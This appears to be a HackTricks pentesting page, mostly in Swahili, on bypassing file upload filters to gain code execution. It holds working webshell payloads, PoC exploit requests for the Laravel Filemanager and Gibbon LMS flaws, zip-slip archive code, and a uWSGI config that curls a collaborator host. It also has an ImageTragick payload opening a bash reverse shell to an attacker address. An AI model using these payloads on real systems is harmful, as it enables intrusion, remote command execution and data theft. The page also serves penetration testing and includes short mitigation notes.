Upakiaji wa Faili

Reading time: 26 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Mbinu za Kawaida za Upakiaji wa Faili

Other useful extensions:

  • PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
  • Working in PHPv8: .php, .php4, .php5, .phtml_, .module_, .inc, .hphp, .ctp
  • ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
  • Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
  • Coldfusion: .cfm, .cfml, .cfc, .dbm
  • Flash: .swf
  • Perl: .pl, .cgi
  • Erlang Yaws Web Server: .yaws

Kupita ukaguzi wa extensions za faili

  1. Ikiwa zinahusika, angalia extensions zilizotajwa hapo awali. Pia zijaribu kwa kutumia herufi kubwa: pHp, .pHP5, .PhAr ...
  2. Kagua kuongeza extension halali kabla ya extension ya utekelezaji (tumia extensions zilizotajwa hapo awali pia):
  • file.png.php
  • file.png.Php5
  1. Jaribu kuongeza viongezaji maalum mwishoni. Unaweza kutumia Burp kufanya bruteforce kwa herufi zote za ascii na Unicode. (Kumbuka kwamba unaweza pia kujaribu kutumia extensions zilizotajwa hapo awali)
  • file.php%20
  • file.php%0a
  • file.php%00
  • file.php%0d%0a
  • file.php/
  • file.php.\
  • file.
  • file.php....
  • file.pHp5....
  1. Jaribu kupita kinga kwa kumdanganya parser wa extension upande wa server kwa mbinu kama kurudia extension au kuongeza takataka (bytes null) kati ya extensions. Unaweza pia kutumia extensions zilizotajwa hapo awali kuandaa payload bora.
  • file.png.php
  • file.png.pHp5
  • file.php#.png
  • file.php%00.png
  • file.php\x00.png
  • file.php%0a.png
  • file.php%0d%0a.png
  • file.phpJunk123png
  1. Ongeza safu nyingine ya extensions kwa ukaguzi uliotangulia:
  • file.png.jpg.php
  • file.php%00.png%00.jpg
  1. Jaribu kuweka extension ya utekelezaji kabla ya extension halali na matumaini server iko misconfigured. (inafaa kuchochea misconfigurations ya Apache ambapo kitu chochote chenye extension .php, lakini sio lazima kiishie kwa .php, kitatekeleza code):
  • ex: file.php.png
  1. Kutumia NTFS alternate data stream (ADS) katika Windows. Katika kesi hii, herufi colon ":" itaingizwa baada ya extension iliyozuiliwa na kabla ya inayoruhusiwa. Kwa matokeo, faili tupu yenye extension iliyozuiliwa itaundwa kwenye server (mfano "file.asax:.jpg”). Faili hii inaweza kuhaririwa baadaye kwa mbinu nyingine kama kutumia short filename yake. Muundo "::$data” unaweza pia kutumika kuunda faili zisizo tupu. Kwa hivyo, kuongeza nukta baada ya muundo huu kunaweza pia kusaidia kupitisha vikwazo zaidi (mfano "file.asp::$data.”)
  2. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatwa. Na PHP ya uharibifu inabaki. AAA<--SNIP-->AAA.php
# Linux maximum 255 bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
# Upload the file and check response how many characters it alllows. Let's say 236
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Make the payload
AAA<--SNIP 232 A-->AAA.php.png

UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) – CVE-2024-21546

Baadhi ya upload handlers hupunguza au ku-normalize nukta za mwisho kutoka kwenye jina la faili lililosafishwa. Katika UniSharp’s Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kupitisha ukaguzi wa extension kwa:

  • Kutumia MIME ya picha halali na magic header (mfano, PNG’s \x89PNG\r\n\x1a\n).
  • Kuita faili iliyopakuliwa kwa extension ya PHP ikifuatiwa na nukta, mfano, shell.php..
  • Server inakata nukta ya mwisho na kuhifadhi shell.php, ambayo itatekelezwa ikiwa itawekwa katika directory inayotumikia web (default public storage kama /storage/files/).

Minimal PoC (Burp Repeater):

http
POST /profile/avatar HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="upload"; filename="0xdf.php."
Content-Type: image/png

\x89PNG\r\n\x1a\n<?php system($_GET['cmd']??'id'); ?>
------WebKitFormBoundary--

Kisha hit njia iliyohifadhiwa (kawaida kwenye Laravel + LFM):

GET /storage/files/0xdf.php?cmd=id

Kukwepa Content-Type, Magic Number, Compression & Resizing

  • Kukwepa ukaguzi wa Content-Type kwa kuweka value ya Content-Type header kuwa: image/png , text/plain , application/octet-stream
  1. Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt
  • Kukwepa ukaguzi wa magic number kwa kuongeza mwanzoni mwa faili bytes za image halisi (kuchanganya amri ya file). Au weka shell ndani ya metadata:
    exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
    \ au unaweza pia kuingiza payload moja kwa moja ndani ya image:
    echo '<?php system($_REQUEST['cmd']); ?>' >> img.png
  • Ikiwa compression inaongezwa kwenye image yako, kwa mfano kwa kutumia maktaba za kawaida za PHP kama PHP-GD, mbinu zilizotangulia hazitafaa. Hata hivyo, unaweza kutumia PLTE chunk technique defined here kuweka maandishi ambayo yata survive compression.
  • Github with the code
  • Ukurasa wa wavuti unaweza pia kuwa unafanya resizing ya image, kwa mfano kwa kutumia PHP-GD functions imagecopyresized au imagecopyresampled. Hata hivyo, unaweza kutumia IDAT chunk technique defined here kuweka maandishi ambayo yata survive compression.
  • Github with the code
  • Mbinu nyingine ya kutengeneza payload ambayo inaishi baada ya image resizing, kwa kutumia PHP-GD function thumbnailImage. Hata hivyo, unaweza kutumia tEXt chunk technique defined here kuweka maandishi ambayo yata survive compression.
  • Github with the code

Mbinu Nyingine za Kuangalia

  • Tafuta udhaifu wa kubadilisha jina (rename) la faili zilizopakuliwa (kubadilisha extension).
  • Tafuta udhaifu wa Local File Inclusion ili kutekeleza backdoor.
  • Mambo yanayoweza kufichua taarifa:
  1. Paka mararufu (Upload several times) (na kwa wakati mmoja) faili ile ile yenye jina moja
  2. Paka faili lenye jina la faili au folder ambalo tayari lipo
  3. Kupakia faili yenye "." , "..", or "…" kama jina la faili. Kwa mfano, kwenye Apache kwenye Windows, ikiwa application inaweka faili zilizopakuliwa kwenye "/www/uploads/" directory, filename "." itaunda faili liitwalo uploads” katika directory ya "/www/".
  4. Paka faili ambayo inaweza kuwa vigumu kufutwa kama "…:.jpg" kwenye NTFS. (Windows)
  5. Paka faili kwenye Windows yenye herufi zisizofaa kama |<>*?” kwenye jina. (Windows)
  6. Paka faili kwenye Windows ukitumia majina yaliyoruhusiwa (reserved/forbidden) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
  • Pia jaribu kupakia executable (.exe) au .html (inayoonekana kidogo kushukiwa) ambayo itatekeleza code pale itakapofunguliwa kwa bahati mbaya na victim.

Mbinu maalum za extension

Ikiwa unajaribu kupakia faili kwenye PHP server, tazama ujanja wa .htaccess ili kutekeleza code.
Ikiwa unajaribu kupakia faili kwenye ASP server, tazama ujanja wa .config ili kutekeleza code.

Faili za .phar ni kama .jar kwa java, lakini kwa php, na zinaweza kutumika kama php file (kuzitekeleza na php, au kuzijumuisha ndani ya script...)

Extension .inc mara nyingine hutumika kwa php files zinazotumika tu kuingiza/import files, hivyo, kwa wakati fulani, mtu anaweza kuwa ameruhusu extension hii itekelezwe.

Jetty RCE

Ikiwa unaweza kupakia faili ya XML kwenye server ya Jetty unaweza kupata RCE kwa sababu **new .xml and .war are automatically processed. Hivyo, kama ilivyoelezwa kwenye picha ifuatayo, pakia faili ya XML kwenye $JETTY_BASE/webapps/ na tarajia shell!

https://twitter.com/ptswarm/status/1555184661751648256/photo/1

uWSGI RCE

Kwa uchambuzi wa kina wa udhaifu huu angalia utafiti wa awali: uWSGI RCE Exploitation.

Remote Command Execution (RCE) inaweza kutumiwa kwenye servers za uWSGI kama mtu ana uwezo wa kubadilisha .ini configuration file. Files za uWSGI configuration zinatumia syntax maalum kuingiza "magic" variables, placeholders, na operators. Haswa, operator '@', inayotumika kama @(filename), imeundwa kujumuisha yaliyomo ya faili. Miongoni mwa schemes mbalimbali zinazotumika katika uWSGI, scheme ya "exec" ni yenye nguvu sana, ikiwezesha kusoma data kutoka stdout ya process. Kipengele hiki kinaweza kutumiwa kwa malengo mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati .ini configuration file inapotengenezwa.

Angalia mfano ufuatao wa fayili hatari uwsgi.ini, ukionyesha schemes mbalimbali:

ini
[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)

Utekelezaji wa payload hutokea wakati wa kuchakata faili la usanidi. Ili usanidi uanze kutumika na kuchambuliwa, mchakato wa uWSGI lazima uanzishwe upya (huenda baada ya kuanguka kwa mchakato au kutokana na shambulio la Denial of Service) au faili lazima iwe imewekwa ili auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, hurudisha faili kwa vipindi vilivyowekwa mara tu linapogundua mabadiliko.

Ni muhimu kuelewa asili ya upole ya uchanganuzi wa faili za usanidi za uWSGI. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binari (kama image au PDF), ikipanua zaidi wigo wa potential exploitation.

Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)

Endpoint isiyo na uthibitisho katika Gibbon LMS inaruhusu kuandika faili kiholela ndani ya web root, ikielekea kwenye pre-auth RCE kwa kuwaweka faili za PHP. Matoleo yaliyo hatarini: hadi na ikiwa ni pamoja na 25.0.01.

  • Endpoint: /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php
  • Method: POST
  • Required params:
  • img: kamba kama data-URI: [mime];[name],[base64] (seva inapuuza type/name, ina-decode base64 sehemu ya mwisho)
  • path: jina la faili la kusudi jinalohusiana na Gibbon install dir (mfano, poc.php au 0xdf.php)
  • gibbonPersonID: thamani yoyote isiyo tupu inakubaliwa (mfano, 0000000001)

PoC ndogo kabisa ya kuandika na kusoma tena faili:

bash
# Prepare test payload
printf '0xdf was here!' | base64
# => MHhkZiB3YXMgaGVyZSEK

# Write poc.php via unauth POST
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;test,MHhkZiB3YXMgaGVyZSEK&path=poc.php&gibbonPersonID=0000000001'

# Verify write
curl http://target/Gibbon-LMS/poc.php

Weka webshell ndogo na endesha amri:

bash
# '<?php system($_GET["cmd"]); ?>' base64
# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==

curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;foo,PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==&path=shell.php&gibbonPersonID=0000000001'

curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'

Vidokezo:

  • Handler hufanya base64_decode($_POST["img"]) baada ya kugawanya kwa ; na ,, kisha inaandika bytes kwa $absolutePath . '/' . $_POST['path'] bila kuthibitisha extension/type.
  • Msimbo unaotokana unaendesha kama mtumiaji wa huduma ya wavuti (kwa mfano, XAMPP Apache kwenye Windows).

Marejeo kwa mdudu huu ni pamoja na usd HeroLab advisory na rekodi ya NVD. Angalia sehemu ya Marejeo hapa chini.

wget File Upload/SSRF Trick

Wakati mwingine utaona kwamba server inatumia wget kupakua faili na unaweza kuonyesha URL. Katika kesi hizi, msimbo unaweza kuwa unakagua kwamba extension ya faili zilizopakuliwa iko ndani ya whitelist ili kuhakikisha kwamba tu faili zinazoruhusiwa zitatapakuliwa. Hata hivyo, ukaguzi huu unaweza kuepukika.\

Urefu wa juu wa jina la faili kwenye linux ni 255, hata hivyo, wget inakata majina ya faili hadi herufi 236. Unaweza kupakua faili liitwalo "A"*232+".php"+".gif", jina hili la faili litaepuka ukaguzi (kama katika mfano huu ".gif" ni extension halali) lakini wget itabadilisha jina la faili kuwa "A"*232+".php".

bash
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080
bash
#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s

2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]

Kumbuka kwamba chaguo jingine unaloweza kufikiria ili kuepuka ukaguzi huu ni kufanya HTTP server redirect to a different file, hivyo initial URL itaepuka ukaguzi na kisha wget itapakua redirected file kwa jina jipya. Hii haitafanya kazi isipokuwa wget inatumika na parameter --trust-server-names kwa sababu wget will download the redirected page with the name of the file indicated in the original URL.

Kutoroka upload directory kupitia NTFS junctions (Windows)

(Kwa shambulio hili utahitaji local access kwa mashine ya Windows) Wakati uploads zinahifadhiwa chini ya per-user subfolders kwenye Windows (mfano, C:\Windows\Tasks\Uploads<id>) na wewe unadhibiti creation/deletion ya subfolder hiyo, unaweza kuibadilisha na directory junction inayoelekeza kwenye eneo nyeti (mfano, webroot). Subsequent uploads zitaandikwa kwenye target path, kuruhusu code execution ikiwa target inatafsiri server‑side code.

Example flow to redirect uploads into XAMPP webroot:

cmd
:: 1) Upload once to learn/confirm your per-user folder name (e.g., md5 of form fields)
::    Observe it on disk: C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882

:: 2) Remove the created folder and create a junction to webroot
rmdir C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
cmd /c mklink /J C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882 C:\xampp\htdocs

:: 3) Re-upload your payload; it lands under C:\xampp\htdocs
::    Minimal PHP webshell for testing
::    <?php echo shell_exec($_REQUEST['cmd']); ?>

:: 4) Trigger
curl "http://TARGET/shell.php?cmd=whoami"

Vidokezo

  • mklink /J creates an NTFS directory junction (reparse point). Akaunti ya web server lazima ifuatilie junction na iwe na ruhusa ya kuandika kwenye mahali lengwa.
  • Hii inaelekeza kuandikwa kwa faili yoyote; ikiwa mahali lengwa kinaendesha scripts (PHP/ASP), hii inageuka kuwa RCE.
  • Ulinzi: usiruhusu writable upload roots ziwe attacker‑controllable chini ya C:\Windows\Tasks au sawa; block junction creation; validate extensions server‑side; store uploads on a separate volume or with deny‑execute ACLs.

GZIP-compressed body upload + path traversal in destination param → JSP webshell RCE (Tomcat)

Baadhi ya upload/ingest handlers huandika raw request body kwenye filesystem path ambayo imejengwa kutoka kwa user-controlled query parameters. Ikiwa handler pia inaunga mkono Content-Encoding: gzip na inashindwa ku-canonicalize/validate destination path, unaweza kuchanganya directory traversal na gzipped payload kuandika arbitrary bytes kwenye web-served directory na kupata RCE (mfano: drop a JSP under Tomcat’s webapps).

Generic exploitation flow:

  • Andaa server-side payload yako (kwa mfano, minimal JSP webshell) na gzip-compress the bytes.
  • Tuma POST ambapo path parameter (mfano, token) ina traversal inayoescape folder iliyokusudiwa, na file inaonyesha filename ya kuhifadhi. Weka Content-Type: application/octet-stream na Content-Encoding: gzip; body ni payload iliyoshinikizwa.
  • Browse to the written file ili kusababisha execution.

Illustrative request:

http
POST /fileupload?token=..%2f..%2f..%2f..%2fopt%2ftomcat%2fwebapps%2fROOT%2Fjsp%2F&file=shell.jsp HTTP/1.1
Host: target
Content-Type: application/octet-stream
Content-Encoding: gzip
Content-Length: <len>

<gzip-compressed-bytes-of-your-jsp>

Kisha ichochee:

http
GET /jsp/shell.jsp?cmd=id HTTP/1.1
Host: target

Vidokezo

  • Njia za malengo hubadilika kulingana na ufungaji (mfano, /opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/ katika baadhi ya stacks). Kabrasha lolote la wavuti linalotekeleza JSP litaweza kufanya kazi.
  • Burp Suite’s Hackvertor extension inaweza kuunda body ya gzip sahihi kutoka kwa payload yako.
  • Hii ni pattern ya pre-auth arbitrary file write → RCE; haitegemei multipart parsing.

Mikakati ya kuzuia

  • Tambua destinations za upload upande wa server; usiamini vipande vya path vinavyotoka kwa clients.
  • Canonicalize na lazimisha kwamba path iliyotatuliwa inabaki ndani ya allow-listed base directory.
  • Hifadhi uploads kwenye volume isiyotekelezwa (non-executable) na kata utekelezaji wa script kutoka kwa paths zinazoweza kuandikwa.

Tools

  • Upload Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.

Corrupting upload indices with snprintf quirks (historical)

Baadhi ya legacy upload handlers zinazotumia snprintf() au sawa ili kujenga multi-file arrays kutoka kwa single-file upload zinaweza kudanganywa kuunda struttura ya _FILES. Kutokana na kutokuwiana na kukatwa kwa tabia ya snprintf(), single upload iliyotengenezwa kwa uangalifu inaweza kuonekana kama files nyingi zilizo na index upande wa server, ikachanganya logic inayodhani muundo thabiti (mfano, kutendea kama multi-file upload na kuchukua branches zisizo salama). Ingawa ni niche leo, pattern hii ya “index corruption” mara kwa mara hurejea katika CTFs na codebases za zamani.

From File upload to other vulnerabilities

Hapa kuna orodha ya top 10 ya mambo unayoweza kufanya kwa kupakia (from here):

  1. ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
  2. SVG: Stored XSS / SSRF / XXE
  3. GIF: Stored XSS / SSRF
  4. CSV: CSV injection
  5. XML: XXE
  6. AVI: LFI / SSRF
  7. HTML / JS : HTML injection / XSS / Open redirect
  8. PNG / JPEG: Pixel flood attack (DoS)
  9. ZIP: RCE via LFI / DoS
  10. PDF / PPTX: SSRF / BLIND XXE

Burp Extension

GitHub - PortSwigger/upload-scanner: HTTP file upload scanner for Burp Proxy

Magic Header Bytes

  • PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["
  • JPG: "\xff\xd8\xff"

Refer to https://en.wikipedia.org/wiki/List_of_file_signatures for other filetypes.

Zip/Tar File Automatically decompressed Upload

If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:

Pakia link inayojumuisha soft links kuelekea faili nyingine; kisha ukiingia faili zilizofinywa utapata faili zilizo linked:

ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt

Kufungua (decompress) katika folda tofauti

Uundaji usiotarajiwa wa faili katika saraka wakati wa kufungua (decompression) ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu ungeweza kutulinda dhidi ya utekelezaji wa amri za kiwango cha OS kupitia uploads za faili zenye madhumuni mabaya, msaada wa compression wa kihierarkia na uwezo wa directory traversal wa muundo wa ZIP unaweza kutumika vibaya. Hii inawawezesha wadukuzi kupita vizingiti na kutoka kwenye saraka za upload zilizohifadhiwa kwa usalama kwa kubadilisha utendakazi wa decompression wa programu lengwa.

Exploit ya otomatiki ya kutengeneza faili kama hizo inapatikana kwenye evilarc on GitHub. Zana inaweza kutumika kama inavyoonyeshwa:

python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php

Zaidi ya hayo, symlink trick with evilarc ni chaguo. Ikiwa lengo ni kulenga faili kama /flag.txt, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitakutana na makosa wakati wa utekelezaji wake.

Hapa chini kuna mfano wa code ya Python inayotumika kuunda faili ya zip yenye madhara:

python
#!/usr/bin/python
import zipfile
from io import BytesIO


def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()

create_zip()

Abusing compression for file spraying

Kwa maelezo zaidi angalia chapisho la asili katika: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/

  1. Creating a PHP Shell: PHP code is written to execute commands passed through the $_REQUEST variable.
php
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>
  1. File Spraying and Compressed File Creation: Multiple files are created and a zip archive is assembled containing these files.
bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
  1. Modification with a Hex Editor or vi: The names of the files inside the zip are altered using vi or a hex editor, changing "xxA" to "../" to traverse directories.
bash
:set modifiable
:%s/xxA/../g
:x!

ZIP NUL-byte filename smuggling (PHP ZipArchive confusion)

Wakati backend inathibitisha entries za ZIP kwa kutumia PHP’s ZipArchive lakini uondoaji unaandika kwenye filesystem kwa kutumia majina ya raw, unaweza kuficha extension isiyoruhusiwa kwa kuingiza NUL (0x00) katika fields za jina la faili. ZipArchive inachukulia jina la entry kama C‑string na inalikatiza kwenye NUL ya kwanza; wakati wa uondoaji, mfumo wa faili huondoa kila kitu kilicho nyuma ya NUL.

High-level flow:

  • Tengeneza faili halali ya container (kwa mfano, PDF halali) ambayo ina embed stub ndogo ya PHP katika stream ili magic/MIME ibaki kuwa PDF.
  • Iche yenye jina kama shell.php..pdf, zip-ie, kisha hex‑edit header ya ZIP local na jina kwenye central directory kubadilisha . ya kwanza baada ya .php kuwa 0x00, ikatoa shell.php\x00.pdf.
  • Validators zinazotegemea ZipArchive zita “ona” shell.php .pdf na kuiruhusu; extractor huitaandika shell.php kwenye disk, ikisababisha RCE ikiwa folder ya upload inaweza kutekelezwa.

Hatua ndogo za PoC:

bash
# 1) Build a polyglot PDF containing a tiny webshell (still a valid PDF)
printf '%s' "%PDF-1.3\n1 0 obj<<>>stream\n<?php system($_REQUEST["cmd"]); ?>\nendstream\nendobj\n%%EOF" > embedded.pdf

# 2) Trick name and zip
cp embedded.pdf shell.php..pdf
zip null.zip shell.php..pdf

# 3) Hex-edit both the local header and central directory filename fields
#    Replace the dot right after ".php" with 00 (NUL) => shell.php\x00.pdf
#    Tools: hexcurse, bless, bvi, wxHexEditor, etc.

# 4) Local validation behavior
php -r '$z=new ZipArchive; $z->open("null.zip"); echo $z->getNameIndex(0),"\n";'
# -> shows truncated at NUL (looks like ".pdf" suffix)

Vidokezo

  • Badilisha BOTH filename occurrences (local and central directory). Some tools add an extra data descriptor entry too – adjust all name fields if present.
  • The payload file must still pass server‑side magic/MIME sniffing. Embedding the PHP in a PDF stream keeps the header valid.
  • Inafanya kazi pale enum/validation path na extraction/write path zinapokoseana kuhusu jinsi ya kushughulikia strings.

Stacked/concatenated ZIPs (parser disagreement)

Kuunganisha ZIP files mbili sahihi huunda blob ambapo parsers tofauti zinaelekeza umakini kwa rekodi tofauti za EOCD. Zana nyingi hupata the last End Of Central Directory (EOCD), wakati baadhi ya libraries (mfano, ZipArchive katika specific workflows) huenda wachambue the first archive wanayokutana nayo. Ikiwa validation inaorodhesha the first archive na extraction inatumia zana nyingine inayoheshimu the last EOCD, benign archive inaweza kupita kwenye checks wakati malicious moja inatolewa.

PoC:

bash
# Build two separate archives
printf test > t1; printf test2 > t2
zip zip1.zip t1; zip zip2.zip t2

# Stack them
cat zip1.zip zip2.zip > combo.zip

# Different views
unzip -l combo.zip   # warns about extra bytes; often lists entries from the last archive
php -r '$z=new ZipArchive; $z->open("combo.zip"); for($i=0;$i<$z->numFiles;$i++) echo $z->getNameIndex($i),"\n";'

Mfano wa matumizi mabaya

  • Unda archive isiyo hatari (aina iliyoruhusiwa, kwa mfano PDF) na archive ya pili inayojumuisha ugani uliopigwa marufuku (kwa mfano, shell.php).
  • Unganisha pamoja: cat benign.zip evil.zip > combined.zip.
  • Ikiwa server inathibitisha kwa parser moja (inaona benign.zip) lakini inachomoa kwa nyingine (inashughulikia evil.zip), faili iliyopigwa marufuku itaweka kwenye njia ya uchomaji.

ImageTragic

Pakia yaliyomo haya kwa ugani wa picha ili kutumia udhaifu (ImageMagick , 7.0.1-1) (kutokana na exploit)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

Kuingiza PHP Shell ndani ya PNG

Kuingiza PHP shell katika chunk ya IDAT ya faili ya PNG kunaweza kuepuka kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funsi imagecopyresized na imagecopyresampled kutoka PHP-GD zina umuhimu maalum hapa, kwani kawaida hutumika kwa kubadilisha ukubwa na resampling ya picha, mtawaliwa. Uwezo wa PHP shell iliyoungwa ndani kusalia isiathiriwe na operesheni hizi ni faida kubwa kwa matukio maalum ya matumizi.

Uchambuzi wa kina wa mbinu hii, pamoja na metodolojia na matumizi yake yanayowezekana, upo kwenye makala ifuatayo: "Encoding Web Shells in PNG IDAT chunks". Rasilimali hii inatoa uelewa kamili wa mchakato na athari zake.

Maelezo zaidi: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

Faili za Polyglot

Faili za polyglot hutoa zana ya kipekee katika usalama wa mtandao, zikifanya kazi kama chamaleoni zinazoweza kuwepo kwa halali katika miundo kadhaa ya faili kwa wakati mmoja. Mfano wa kuvutia ni GIFAR, muunganiko unaofanya kazi kama GIF na pia kama archive ya RAR. Faili za aina hii hazina ukomo kwa muungano huo; mchanganyiko kama GIF na JS au PPT na JS pia ni uwezekano.

